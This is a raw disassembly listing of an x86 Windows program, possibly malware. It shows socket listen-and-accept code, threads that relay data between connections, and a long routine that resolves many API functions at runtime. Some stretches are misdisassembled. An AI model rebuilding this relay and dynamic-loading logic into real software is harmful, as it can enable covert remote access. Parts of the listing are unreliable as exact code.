mov ds:dword_4358DC[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40550F
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_405889
loc_40587E: ; CODE XREF: sub_40550F+378�j
cmp [ebp+var_4], ebx
jnz short loc_4058B0
push 1Eh
call esi ; Sleep
jmp short loc_40587E
; ---------------------------------------------------------------------------
loc_405889: ; CODE XREF: sub_40550F+36D�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset dword_420418
push eax
call sub_41050B
lea eax, [ebp+var_1CC]
push eax
call sub_407E0E
add esp, 10h
loc_4058B0: ; CODE XREF: sub_40550F+372�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40580F
loc_4058BE: ; CODE XREF: sub_40550F+2FA�j
cmp [ebp+var_30], ebx
jz near ptr loc_405967+1
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_4058D3: ; CODE XREF: sub_40550F+464�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_42F3F8[eax*8]
push eax
call ds:dword_43081C
push eax
lea eax, [ebp+var_1CC]
push offset dword_4203C0
push eax
call sub_41050B
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_405921
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40E367
add esp, 14h
loc_405921: ; CODE XREF: sub_40550F+3F3�j
lea eax, [ebp+var_1CC]
push eax
call sub_407E0E
mov eax, [ebp+var_2C]
mov [esp+29Ch+var_29C], 0BB8h
mov ds:dword_42F3FC[eax*8], ebx
call esi ; Sleep
push 8
call sub_4101FF
cmp eax, 1
pop ecx
jnz short loc_405958
push offset dword_42FD58
call ds:dword_41C0A8 ; RtlDeleteCriticalSection
loc_405958: ; CODE XREF: sub_40550F+43C�j
push [ebp+var_2C]
call sub_4102D3
pop ecx
push ebx
call near ptr 3D0000h
loc_405967: ; CODE XREF: sub_40550F+3B2�j
; sub_40550F+471�j
test byte ptr [ebx+3C83D445h], 0C5h
cld
rep inc edx
add [ecx], al
jnz loc_4058D3
push 7D0h
call esi ; Sleep
jmp short near ptr loc_405967+1
sub_40550F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405982 proc near ; DATA XREF: seg000:0040C09C�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_410590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call ds:dword_430794
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call ds:dword_430810
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_405AE6
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov ds:dword_4358E4[eax], ebx
call ds:dword_4306C0
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4307C0
test eax, eax
jnz loc_405AE6
push 0Ah
push ebx
call ds:dword_4307BC
test eax, eax
jnz loc_405AE6
loc_405A2C: ; CODE XREF: sub_405982+BE�j
; sub_405982+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_430824
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_405A2C
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call ds:dword_43081C
push eax
lea eax, [ebp+var_34C]
push offset dword_420550
push eax
call sub_41050B
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_40FFB7
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_4358DC[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_405B0A
push esi
push esi
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_4358EC[ecx], eax
jz short loc_405AD1
loc_405ABE: ; CODE XREF: sub_405982+14D�j
cmp [ebp+var_2C], esi
jnz loc_405A2C
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_405ABE
; ---------------------------------------------------------------------------
loc_405AD1: ; CODE XREF: sub_405982+13A�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_420500
call sub_407E82
pop ecx
pop ecx
jmp short loc_405AE9
; ---------------------------------------------------------------------------
loc_405AE6: ; CODE XREF: sub_405982+61�j
; sub_405982+93�j ...
mov edi, [ebp+arg_0]
loc_405AE9: ; CODE XREF: sub_405982+162�j
push edi
call ds:dword_430828
push ebx
call ds:dword_430828
push [ebp+var_3C]
call sub_4102D3
pop ecx
push esi
call near ptr 3D0000h
xchg eax, edx
pop edi
pop esi
pop ebx
sub_405982 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B0A proc near ; DATA XREF: sub_405982+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_410BE0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call ds:dword_430810
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_405CC0
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_410590
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_430794
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_4307D0
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_405B9A
lea eax, [ebp+var_13C]
push eax
call ds:dword_430814
jmp short loc_405BA8
; ---------------------------------------------------------------------------
loc_405B9A: ; CODE XREF: sub_405B0A+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_430750
loc_405BA8: ; CODE XREF: sub_405B0A+8E�j
cmp eax, edi
jz loc_405CC0
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_430740
cmp eax, 0FFFFFFFFh
jz loc_405CC0
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_43081C
push eax
lea eax, [ebp+var_344]
push offset dword_4205FC
push eax
call sub_41050B
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_40FFB7
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_4358E4[ebx]
mov ds:dword_4358DC[eax], ecx
add esp, 20h
mov ecx, [esi]
mov ds:dword_4358E8[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push (offset loc_405CED+4)
push edi
push edi
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov ds:dword_4358EC[ecx], eax
jz short loc_405CAD
loc_405C5A: ; CODE XREF: sub_405B0A+15D�j
cmp [ebp+var_20], edi
jnz short loc_405C69
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_405C5A
; ---------------------------------------------------------------------------
loc_405C69: ; CODE XREF: sub_405B0A+153�j
mov ebx, 1000h
loc_405C6E: ; CODE XREF: sub_405B0A+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_4307AC
cmp eax, edi
jle short loc_405CC0
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_4307E0
cmp eax, 0FFFFFFFFh
jnz short loc_405C6E
jmp short loc_405CC0
; ---------------------------------------------------------------------------
loc_405CAD: ; CODE XREF: sub_405B0A+14E�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_4205A8
call sub_407E82
pop ecx
pop ecx
loc_405CC0: ; CODE XREF: sub_405B0A+44�j
; sub_405B0A+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push ds:dword_4358E4[eax]
call ds:dword_430828
push [ebp+arg_0]
call ds:dword_430828
push [ebp+var_4]
call sub_4102D3
pop ecx
push edi
call near ptr 3D0000h
loc_405CED: ; DATA XREF: sub_405B0A+130�o
mov edx, 555B5E5Fh
sub_405B0A endp ; sp-analysis failed
mov ebp, esp
mov eax, 1128h
call sub_410BE0
mov eax, [ebp+8]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp-128h]
rep movsd
mov esi, [ebp-14h]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_405D28: ; CODE XREF: seg000:00405D6D�j
push edi
lea eax, [ebp-1128h]
push 0
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp-1128h]
push 0
push edi
push eax
push ds:dword_4358E8[esi]
call ds:dword_4307AC
test eax, eax
jle short loc_405D6F
push 0
push eax
lea eax, [ebp-1128h]
push eax
push ds:dword_4358E4[esi]
call ds:dword_4307E0
cmp eax, 0FFFFFFFFh
jnz short loc_405D28
loc_405D6F: ; CODE XREF: seg000:00405D52�j
push ds:dword_4358E8[esi]
call ds:dword_430828
push dword ptr [ebp-14h]
call sub_4102D3
pop ecx
push 0
call near ptr 3D0000h
pop ss
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
sub_405D8E proc near ; CODE XREF: sub_4089FD+140�p
push ebx
push ebp
mov ebp, ds:dword_41C0B4
push esi
push edi
push offset dword_420E84
call ebp ; GetModuleHandleA
mov esi, ds:dword_41C0B0
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_405EAE
push offset dword_420E74
push edi
call esi
push offset dword_420E58
push edi
mov ds:dword_43083C, eax
call esi
push offset dword_420E48
push edi
mov ds:dword_4307B4, eax
call esi
push offset dword_420E38
push edi
mov ds:dword_430798, eax
call esi
push offset dword_420E28
push edi
mov ds:dword_4306C4, eax
call esi
push offset dword_420E14
push edi
mov ds:dword_430674, eax
call esi
push offset dword_420DFC
push edi
mov ds:dword_4306A0, eax
call esi
push offset dword_420DEC
push edi
mov ds:dword_430710, eax
call esi
push offset dword_420DE0
push edi
mov ds:dword_4307F0, eax
call esi
push offset dword_420DC8
push edi
mov ds:dword_43084C, eax
call esi
push offset dword_420DAC
push edi
mov ds:dword_4306D0, eax
call esi
cmp ds:dword_43083C, ebx
mov ds:dword_4306B8, eax
jz short loc_405E8C
cmp ds:dword_4307B4, ebx
jz short loc_405E8C
cmp ds:dword_430798, ebx
jz short loc_405E8C
cmp ds:dword_4306C4, ebx
jz short loc_405E8C
cmp ds:dword_4306A0, ebx
jz short loc_405E8C
cmp ds:dword_430710, ebx
jz short loc_405E8C
cmp ds:dword_4307F0, ebx
jz short loc_405E8C
cmp ds:dword_43084C, ebx
jz short loc_405E8C
cmp ds:dword_4306D0, ebx
jz short loc_405E8C
cmp eax, ebx
jnz short loc_405E96
loc_405E8C: ; CODE XREF: sub_405D8E+B8�j
; sub_405D8E+C0�j ...
mov ds:dword_430850, 1
loc_405E96: ; CODE XREF: sub_405D8E+FC�j
push offset dword_420D94
push edi
call esi
cmp eax, ebx
mov ds:dword_4307C8, eax
jz short loc_405EC3
push 1
push ebx
call eax
jmp short loc_405EC3
; ---------------------------------------------------------------------------
loc_405EAE: ; CODE XREF: sub_405D8E+1D�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_430854, eax
mov ds:dword_430850, 1
loc_405EC3: ; CODE XREF: sub_405D8E+117�j
; sub_405D8E+11E�j
push offset dword_420D88
call ds:dword_41C0AC ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405F7E
push offset dword_420D78
push edi
call esi
push offset dword_420D6C
push edi
mov ds:dword_4307EC, eax
call esi
push offset dword_420D60
push edi
mov ds:dword_4307A0, eax
call esi
push offset dword_420D50
push edi
mov ds:dword_430738, eax
call esi
push offset dword_420D40
push edi
mov ds:dword_430840, eax
call esi
push offset dword_420D2C
push edi
mov ds:dword_430764, eax
call esi
push offset dword_420D1C
push edi
mov ds:dword_430784, eax
call esi
push offset dword_420D0C
push edi
mov ds:dword_4307E4, eax
call esi
cmp ds:dword_4307EC, ebx
mov ds:dword_4306EC, eax
jz short loc_405F89
cmp ds:dword_4307A0, ebx
jz short loc_405F89
cmp ds:dword_430738, ebx
jz short loc_405F89
cmp ds:dword_430840, ebx
jz short loc_405F89
cmp ds:dword_430764, ebx
jz short loc_405F89
cmp ds:dword_430784, ebx
jz short loc_405F89
cmp ds:dword_4307E4, ebx
jz short loc_405F89
cmp eax, ebx
jnz short loc_405F93
jmp short loc_405F89
; ---------------------------------------------------------------------------
loc_405F7E: ; CODE XREF: sub_405D8E+144�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_43085C, eax
loc_405F89: ; CODE XREF: sub_405D8E+1B8�j
; sub_405D8E+1C0�j ...
mov ds:dword_430858, 1
loc_405F93: ; CODE XREF: sub_405D8E+1EC�j
push offset dword_420CFC
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40612E
push offset dword_420CEC
push edi
call esi
push offset dword_420CDC
push edi
mov ds:dword_430800, eax
call esi
push offset dword_420CCC
push edi
mov ds:dword_43074C, eax
call esi
push offset dword_420CB8
push edi
mov ds:dword_4307B8, eax
call esi
push offset dword_420CA8
push edi
mov ds:dword_4306B0, eax
call esi
push offset dword_420C9C
push edi
mov ds:dword_43070C, eax
call esi
cmp ds:dword_430800, ebx
mov ds:dword_430770, eax
jz short loc_40601E
cmp ds:dword_43074C, ebx
jz short loc_40601E
cmp ds:dword_4307B8, ebx
jz short loc_40601E
cmp ds:dword_4306B0, ebx
jz short loc_40601E
cmp ds:dword_43070C, ebx
jz short loc_40601E
cmp eax, ebx
jnz short loc_406028
loc_40601E: ; CODE XREF: sub_405D8E+26A�j
; sub_405D8E+272�j ...
mov ds:dword_430860, 1
loc_406028: ; CODE XREF: sub_405D8E+28E�j
push offset dword_420C88
push edi
call esi
push offset dword_420C70
push edi
mov ds:dword_430778, eax
call esi
push offset dword_420C58
push edi
mov ds:dword_430754, eax
call esi
cmp ds:dword_430778, ebx
mov ds:dword_4307FC, eax
jz short loc_406063
cmp ds:dword_430754, ebx
jz short loc_406063
cmp eax, ebx
jnz short loc_40606D
loc_406063: ; CODE XREF: sub_405D8E+2C7�j
; sub_405D8E+2CF�j
mov ds:dword_430860, 1
loc_40606D: ; CODE XREF: sub_405D8E+2D3�j
push offset dword_420C48
push edi
call esi
push offset dword_420C38
push edi
mov ds:dword_430788, eax
call esi
push offset dword_420C28
push edi
mov ds:dword_43068C, eax
call esi
push offset dword_420C18
push edi
mov ds:dword_430694, eax
call esi
push offset dword_420C08
push edi
mov ds:dword_4306F4, eax
call esi
push offset dword_420BF4
push edi
mov ds:dword_4306F8, eax
call esi
push offset dword_420BE0
push edi
mov ds:dword_4306A8, eax
call esi
push offset dword_420BC4
push edi
mov ds:dword_430758, eax
call esi
cmp ds:dword_430788, ebx
mov ds:dword_430698, eax
jz short loc_406111
cmp ds:dword_43068C, ebx
jz short loc_406111
cmp ds:dword_430694, ebx
jz short loc_406111
cmp ds:dword_4306F4, ebx
jz short loc_406111
cmp ds:dword_4306F8, ebx
jz short loc_406111
cmp ds:dword_4306A8, ebx
jz short loc_406111
cmp ds:dword_430758, ebx
jz short loc_406111
cmp eax, ebx
jnz short loc_40611B
loc_406111: ; CODE XREF: sub_405D8E+34D�j
; sub_405D8E+355�j ...
mov ds:dword_430860, 1
loc_40611B: ; CODE XREF: sub_405D8E+381�j
push offset dword_420BB4
push edi
call esi
cmp eax, ebx
mov ds:dword_430690, eax
jnz short loc_406143
jmp short loc_406139
; ---------------------------------------------------------------------------
loc_40612E: ; CODE XREF: sub_405D8E+210�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_430864, eax
loc_406139: ; CODE XREF: sub_405D8E+39E�j
mov ds:dword_430860, 1
loc_406143: ; CODE XREF: sub_405D8E+39C�j
push offset dword_420BA8
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40620F
push offset dword_420B9C
push edi
call esi
push offset dword_420B88
push edi
mov ds:dword_430780, eax
call esi
push offset dword_420B74
push edi
mov ds:dword_4307D4, eax
call esi
push offset dword_420B64
push edi
mov ds:dword_4307DC, eax
call esi
push offset dword_420B50
push edi
mov ds:dword_43079C, eax
call esi
push offset dword_420B40
push edi
mov ds:dword_4306D4, eax
call esi
push offset dword_420B38
push edi
mov ds:dword_430684, eax
call esi
push offset dword_420B2C
push edi
mov ds:dword_4307D8, eax
call esi
push offset dword_420B1C
push edi
mov ds:dword_430670, eax
call esi
cmp ds:dword_430780, ebx
mov ds:dword_430704, eax
jz short loc_40621A
cmp ds:dword_4307D4, ebx
jz short loc_40621A
cmp ds:dword_4307DC, ebx
jz short loc_40621A
cmp ds:dword_43079C, ebx
jz short loc_40621A
cmp ds:dword_4306D4, ebx
jz short loc_40621A
cmp ds:dword_430684, ebx
jz short loc_40621A
cmp ds:dword_4307D8, ebx
jz short loc_40621A
cmp ds:dword_430670, ebx
jz short loc_40621A
cmp eax, ebx
jnz short loc_406224
jmp short loc_40621A
; ---------------------------------------------------------------------------
loc_40620F: ; CODE XREF: sub_405D8E+3C0�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_43086C, eax
loc_40621A: ; CODE XREF: sub_405D8E+441�j
; sub_405D8E+449�j ...
mov ds:dword_430868, 1
loc_406224: ; CODE XREF: sub_405D8E+47D�j
mov ebp, ds:dword_41C0AC
push offset dword_420B10
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4064E0
push offset dword_420B04
push edi
call esi
push offset dword_420AF8
push edi
mov ds:dword_430718, eax
call esi
push offset dword_420AE8
push edi
mov ds:dword_430834, eax
call esi
push offset dword_420AD8
push edi
mov ds:dword_4306C0, eax
call esi
push offset dword_420ACC
push edi
mov ds:dword_43069C, eax
call esi
push offset dword_420ABC
push edi
mov ds:dword_430744, eax
call esi
push offset dword_420AB0
push edi
mov ds:dword_430730, eax
call esi
push offset dword_420AA8
push edi
mov ds:dword_430700, eax
call esi
push offset dword_420A9C
push edi
mov ds:dword_430810, eax
call esi
push offset dword_420A94
push edi
mov ds:dword_43082C, eax
call esi
push offset dword_420A88
push edi
mov ds:dword_430740, eax
call esi
push offset dword_420A7C
push edi
mov ds:dword_43081C, eax
call esi
push offset dword_420A74
push edi
mov ds:dword_4307D0, eax
call esi
push offset dword_420A6C
push edi
mov ds:dword_430794, eax
call esi
push offset dword_420A64
push edi
mov ds:dword_430790, eax
call esi
push offset dword_420A5C
push edi
mov ds:dword_4306E0, eax
call esi
push offset dword_420A54
push edi
mov ds:dword_4306D8, eax
call esi
push offset dword_420A4C
push edi
mov ds:dword_4307E0, eax
call esi
push offset dword_420A44
push edi
mov ds:dword_4307F4, eax
call esi
push offset dword_420A38
push edi
mov ds:dword_4307AC, eax
call esi
mov ds:dword_43076C, eax
push offset dword_420A30
push edi
call esi
push offset dword_420A28
push edi
mov ds:dword_4307C0, eax
call esi
push offset dword_420A20
push edi
mov ds:dword_43077C, eax
call esi
push offset dword_420A18
push edi
mov ds:dword_4307BC, eax
call esi
push offset dword_420A0C
push edi
mov ds:dword_430824, eax
call esi
push offset dword_420A00
push edi
mov ds:dword_430774, eax
call esi
push offset dword_4209F4
push edi
mov ds:dword_43073C, eax
call esi
push offset dword_4209E4
push edi
mov ds:dword_4307A8, eax
call esi
push offset dword_4209D4
push edi
mov ds:dword_430814, eax
call esi
push offset dword_4209C8
push edi
mov ds:dword_430750, eax
call esi
push offset dword_4209BC
push edi
mov ds:dword_4306FC, eax
call esi
cmp ds:dword_430718, ebx
mov ds:dword_430828, eax
jz loc_4064EB
cmp ds:dword_430834, ebx
jz loc_4064EB
cmp ds:dword_4306C0, ebx
jz loc_4064EB
cmp ds:dword_430744, ebx
jz loc_4064EB
cmp ds:dword_430730, ebx
jz loc_4064EB
cmp ds:dword_430700, ebx
jz loc_4064EB
cmp ds:dword_430810, ebx
jz loc_4064EB
cmp ds:dword_43082C, ebx
jz loc_4064EB
cmp ds:dword_430740, ebx
jz loc_4064EB
cmp ds:dword_43081C, ebx
jz loc_4064EB
cmp ds:dword_4307D0, ebx
jz loc_4064EB
cmp ds:dword_430794, ebx
jz loc_4064EB
cmp ds:dword_430790, ebx
jz loc_4064EB
cmp ds:dword_4306E0, ebx
jz short loc_4064EB
cmp ds:dword_4307E0, ebx
jz short loc_4064EB
cmp ds:dword_4307F4, ebx
jz short loc_4064EB
cmp ds:dword_4307AC, ebx
jz short loc_4064EB
cmp ds:dword_43076C, ebx
jz short loc_4064EB
cmp ds:dword_4307C0, ebx
jz short loc_4064EB
cmp ds:dword_43077C, ebx
jz short loc_4064EB
cmp ds:dword_4307BC, ebx
jz short loc_4064EB
cmp ds:dword_430824, ebx
jz short loc_4064EB
cmp ds:dword_430774, ebx
jz short loc_4064EB
cmp ds:dword_43073C, ebx
jz short loc_4064EB
cmp ds:dword_4307A8, ebx
jz short loc_4064EB
cmp ds:dword_430814, ebx
jz short loc_4064EB
cmp ds:dword_430750, ebx
jz short loc_4064EB
cmp eax, ebx
jnz short loc_4064F5
jmp short loc_4064EB
; ---------------------------------------------------------------------------
loc_4064E0: ; CODE XREF: sub_405D8E+4A7�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_430874, eax
loc_4064EB: ; CODE XREF: sub_405D8E+646�j
; sub_405D8E+652�j ...
mov ds:dword_430870, 1
loc_4064F5: ; CODE XREF: sub_405D8E+74E�j
push offset dword_4209B0
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4065FA
push offset dword_420994
push edi
call esi
push offset dword_420978
push edi
mov ds:dword_4306E8, eax
call esi
push offset dword_420964
push edi
mov ds:dword_430678, eax
call esi
push offset dword_420950
push edi
mov ds:dword_430760, eax
call esi
push offset dword_42093C
push edi
mov ds:dword_43071C, eax
call esi
push offset dword_42092C
push edi
mov ds:dword_430768, eax
call esi
push offset dword_420918
push edi
mov ds:dword_430734, eax
call esi
push offset dword_420904
push edi
mov ds:dword_4306B4, eax
call esi
push offset dword_4208F0
push edi
mov ds:dword_4306AC, eax
call esi
push offset dword_4208DC
push edi
mov ds:dword_4306BC, eax
call esi
cmp ds:dword_4306E8, ebx
mov ecx, ds:dword_430734
mov ds:dword_4307C4, eax
jz short loc_4065D6
cmp ds:dword_430678, ebx
jz short loc_4065D6
cmp ds:dword_430760, ebx
jz short loc_4065D6
cmp ds:dword_43071C, ebx
jz short loc_4065D6
cmp ds:dword_430768, ebx
jz short loc_4065D6
cmp ecx, ebx
jz short loc_4065D6
cmp ds:dword_4306B4, ebx
jz short loc_4065D6
cmp ds:dword_4306AC, ebx
jz short loc_4065D6
cmp ds:dword_4306BC, ebx
jz short loc_4065D6
cmp eax, ebx
jnz short loc_4065E0
loc_4065D6: ; CODE XREF: sub_405D8E+806�j
; sub_405D8E+80E�j ...
mov ds:dword_430878, 1
loc_4065E0: ; CODE XREF: sub_405D8E+846�j
cmp ecx, ebx
jz short loc_406615
push ebx
push ebx
push ebx
push ebx
push offset dword_4208C0
call ecx
cmp eax, ebx
mov ds:dword_430748, eax
jnz short loc_406615
jmp short loc_40660F
; ---------------------------------------------------------------------------
loc_4065FA: ; CODE XREF: sub_405D8E+772�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_43087C, eax
mov ds:dword_430878, 1
loc_40660F: ; CODE XREF: sub_405D8E+86A�j
mov ds:dword_430748, ebx
loc_406615: ; CODE XREF: sub_405D8E+854�j
; sub_405D8E+868�j
push offset dword_4208B4
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40665F
push offset dword_4208A4
push edi
call esi
push offset dword_420894
push edi
mov ds:dword_430728, eax
call esi
push offset dword_420884
push edi
mov ds:dword_430848, eax
call esi
cmp ds:dword_430728, ebx
mov ds:dword_4306C8, eax
jz short loc_40666A
cmp ds:dword_430848, ebx
jz short loc_40666A
cmp eax, ebx
jnz short loc_406674
jmp short loc_40666A
; ---------------------------------------------------------------------------
loc_40665F: ; CODE XREF: sub_405D8E+892�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_430884, eax
loc_40666A: ; CODE XREF: sub_405D8E+8C1�j
; sub_405D8E+8C9�j ...
mov ds:dword_430880, 1
loc_406674: ; CODE XREF: sub_405D8E+8CD�j
push offset dword_420874
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40676A
push offset dword_420868
push edi
call esi
push offset dword_42085C
push edi
mov ds:dword_4306A4, eax
call esi
push offset dword_42084C
push edi
mov ds:dword_430680, eax
call esi
push offset dword_420838
push edi
mov ds:dword_4306F0, eax
call esi
push offset dword_420824
push edi
mov ds:dword_430720, eax
call esi
push offset dword_420814
push edi
mov ds:dword_430820, eax
call esi
push offset dword_420808
push edi
mov ds:dword_4306DC, eax
call esi
push offset dword_4207FC
push edi
mov ds:dword_430688, eax
call esi
push offset dword_4207F0
push edi
mov ds:dword_43067C, eax
call esi
push offset dword_4207E0
push edi
mov ds:dword_430708, eax
call esi
push offset dword_4207C8
push edi
mov ds:dword_4307E8, eax
call esi
cmp ds:dword_4306A4, ebx
mov ds:dword_4307A4, eax
jz short loc_406775
cmp ds:dword_430680, ebx
jz short loc_406775
cmp ds:dword_4306F0, ebx
jz short loc_406775
cmp ds:dword_430720, ebx
jz short loc_406775
cmp ds:dword_430820, ebx
jz short loc_406775
cmp ds:dword_4306DC, ebx
jz short loc_406775
cmp ds:dword_430688, ebx
jz short loc_406775
cmp ds:dword_43067C, ebx
jz short loc_406775
cmp ds:dword_430708, ebx
jz short loc_406775
cmp ds:dword_4307E8, ebx
jz short loc_406775
cmp eax, ebx
jnz short loc_40677F
jmp short loc_406775
; ---------------------------------------------------------------------------
loc_40676A: ; CODE XREF: sub_405D8E+8F1�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_43088C, eax
loc_406775: ; CODE XREF: sub_405D8E+98C�j
; sub_405D8E+994�j ...
mov ds:dword_430888, 1
loc_40677F: ; CODE XREF: sub_405D8E+9D8�j
push offset dword_4207BC
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4067B4
push offset dword_4207A4
push edi
call esi
push offset dword_420784
push edi
mov ds:dword_4306CC, eax
call esi
cmp ds:dword_4306CC, ebx
mov ds:dword_43078C, eax
jz short loc_4067BF
cmp eax, ebx
jnz short loc_4067C9
jmp short loc_4067BF
; ---------------------------------------------------------------------------
loc_4067B4: ; CODE XREF: sub_405D8E+9FC�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_430894, eax
loc_4067BF: ; CODE XREF: sub_405D8E+A1E�j
; sub_405D8E+A24�j
mov ds:dword_430890, 1
loc_4067C9: ; CODE XREF: sub_405D8E+A22�j
push offset dword_420774
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4067FE
push offset dword_420764
push edi
call esi
push offset dword_420750
push edi
mov ds:dword_43080C, eax
call esi
cmp ds:dword_43080C, ebx
mov ds:dword_430808, eax
jz short loc_406809
cmp eax, ebx
jnz short loc_406813
jmp short loc_406809
; ---------------------------------------------------------------------------
loc_4067FE: ; CODE XREF: sub_405D8E+A46�j
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ds:dword_43089C, eax
loc_406809: ; CODE XREF: sub_405D8E+A68�j
; sub_405D8E+A6E�j
mov ds:dword_430898, 1
loc_406813: ; CODE XREF: sub_405D8E+A6C�j
push offset dword_420748
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406872
push offset dword_420734
push edi
call esi
push offset dword_420720
push edi
mov ds:dword_430838, eax
call esi
push offset dword_420708
push edi
mov ds:dword_430830, eax
call esi
push offset dword_4206F0
push edi
mov ds:dword_4307F8, eax
call esi
cmp ds:dword_430838, ebx
mov ds:dword_4306E4, eax
jz short loc_40687D
